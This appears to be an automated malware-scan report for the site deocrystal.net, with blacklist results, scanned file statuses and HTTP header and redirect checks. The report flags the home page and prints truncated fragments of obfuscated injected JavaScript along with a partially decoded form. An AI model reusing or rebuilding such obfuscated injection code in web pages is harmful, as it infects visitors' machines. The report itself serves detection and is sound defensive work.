Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=deocrystal.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://deocrystal.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://deocrystal.net/ | 200 OK Content-Length: 64499 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(PuE){var sx=function(X5A){return X5A["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},br=function(vX){return vX[sx(918239)]("") },M5z=""+br(["\x08\xb7?~\x97\x95f","\xa9&\xe9\x10\x83","\x1fne\xd2Vu\xcd\x17","/:l6OBXdRk`YbnJ\x09<","\x1e\x0cMnjWAl\x0e>","\x08\x0aMV|\x07uTLE","\\PDtUm6^fVlHJ_r\x01",":\x0c\x0c\x1e;/+\x09","0\x09\x08'.\x1b*-$","\x1c9;\x0b,\x0buDHEt","ykl/Ws\x0e[N\\~\x0b*","\x16[vT\x0b\x16xu<+(","\x16;\x0f\x10|pUh2^B","$\x18\x09\x14*\x20|3","6\x1fgFR$^a\x0b*@V}R","ROo Decoded script: /*h4HfICroqjTll*//*knzSCk*//*IGO1wroVmvbtEi4YBGKhNNA78*/ (function(sb){JMM=(0xee-0xe8)/2*(0xaf^0xa7)/2*0x11;var OR=(function(z){var a=[KRY("cbecwETOEmt]F"),KRY("wydvk"),KRY("huiekT"),KRY("sdynf"),KRY("a`pgmDRKIlu"),KRY("gutGoE|FNtbqKVCD]POG"),KRY("Mqtj"),KRY("ofepeL~T"),KRY("p\x7fskwI~M"),KRY("lufv")],b=[KRY("d\x7fcwnE\x7fW"),KRY("f|omq"),KRY("rqnflM"),KRY("lunewH"),KRY("sbc")],s=[KRY("dyv"),KRY("ivrcnE")],r=[KRY("hydffN"),KRY("arsmoUeF"),KRY("-!023\x10a Antivirus reports:
| ||
http://deocrystal.net/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/x-javascript | clean |
http://deocrystal.net/components/com_rsform/controller/functions.js | 200 OK Content-Length: 18523 Content-Type: application/x-javascript | clean |
http://deocrystal.net/templates/Deoblu/js/mootools1.11.js | 200 OK Content-Length: 43710 Content-Type: application/x-javascript | clean |
http://deocrystal.net/templates/Deoblu/js/menu.js | 200 OK Content-Length: 1495 Content-Type: application/x-javascript | clean |
http://deocrystal.net/templates/Deoblu/js/main.js | 200 OK Content-Length: 377 Content-Type: application/x-javascript | clean |
http://deocrystal.net/share42/share42.js | 200 OK Content-Length: 3386 Content-Type: application/x-javascript | clean |
http://deocrystal.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: deocrystal.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 17 Sep 2014 04:26:16 GMT
Pragma: no-cache
Server: nginx/1.4.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 17 Sep 2014 04:26:16 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 707bbdb1cd51e01a5ecf21e758737f8a=bg6vr1n03hriuoef1adq91hfj5; path=/
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: deocrystal.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 17 Sep 2014 04:26:16 GMT
Pragma: no-cache
Server: nginx/1.4.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 17 Sep 2014 04:26:16 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 707bbdb1cd51e01a5ecf21e758737f8a=bg6vr1n03hriuoef1adq91hfj5; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: deocrystal.net
Referer: http://www.google.com/search?q=deocrystal.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: deocrystal.net
Referer: http://www.google.com/search?q=deocrystal.net
Result:
The result is similar to the first query. There are no suspicious redirects found.